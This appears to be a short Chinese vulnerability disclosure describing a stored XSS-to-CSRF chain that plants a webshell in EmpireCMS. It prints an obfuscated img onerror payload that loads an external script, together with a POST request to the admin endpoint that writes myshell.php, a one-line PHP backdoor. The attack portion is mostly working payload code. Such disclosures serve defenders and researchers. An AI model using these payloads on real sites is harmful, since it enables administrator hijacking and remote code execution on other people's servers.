EmpireCMS(帝国cms)csrf getshell

### 简要描述： EmpireCMS(帝国cms)csrf getshell 最新版本。 ### 详细说明： 参见漏洞: [WooYun: 帝国CMS CSRF GetShell](http://www.wooyun.org/bugs/wooyun-2013-032472) 帝国cms默认添加栏目时候默认是允许投稿。 另外帝国的会员中心基本都是开启的，有的就算不开启也是可以匿名投稿。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201407/041920436a7a75d3a69709cee90932e3cc833e12.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/041920436a7a75d3a69709cee90932e3cc833e12.jpg) 图1所示，帝国添加栏目时候默认是开启投稿的。 [<img src="https://images.seebug.org/upload/201407/0419213429050a91e03191b07751f1220a8a8115.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/0419213429050a91e03191b07751f1220a8a8115.jpg) 图2所示，虽然过滤的<script>，但是未过滤img中的污染数据。这个地方插入 ``` <img src=1 onerror='var s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,49,46,106,115);document.body.appendChild(s);'> ``` 也就是http://127.0.0.1/1.js，1.js代码看这里 [WooYun: 帝国CMS CSRF GetShell](http://www.wooyun.org/bugs/wooyun-2013-032472) [<img src="https://images.seebug.org/upload/201407/041923060fea177d5a4dad9119f63599508b8213.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/041923060fea177d5a4dad9119f63599508b8213.jpg) 图3所示：管理员看到未审核内容时候点击标题可以查看内容。 [<img src="https://images.seebug.org/upload/201407/041926058a4deb8cae3a5c6ac887f1469811f13d.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/041926058a4deb8cae3a5c6ac887f1469811f13d.jpg) 图4所示：管理员查看预览稿件时候调用外部1.js，post /e/admin/ecmscom.php ``` enews=AddUserpage&id=&oldpath=page.html&cid=&gid=1&pagemod=1&title=aaa&path=page.html&classid=0&pagetitle=&pagekeywords=&pagedescription=&pagetext=%3C%3Fphp+file_put_contents%28%27myshell.php%27%2C%27%3C%3Fphp+%24_GET%5Bc%5D%28%24_POST%5Bx%5D%29%3B%3F%3E%27%29%3B%3F%3E&Submit=%E6%8F%90%E4%BA%A4 ``` 在/e/admin/目录生成myshell.php一句话。 [<img src="https://images.seebug.org/upload/201407/04192842935ae649d0d8d742b4c356105037457a.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/04192842935ae649d0d8d742b4c356105037457a.jpg)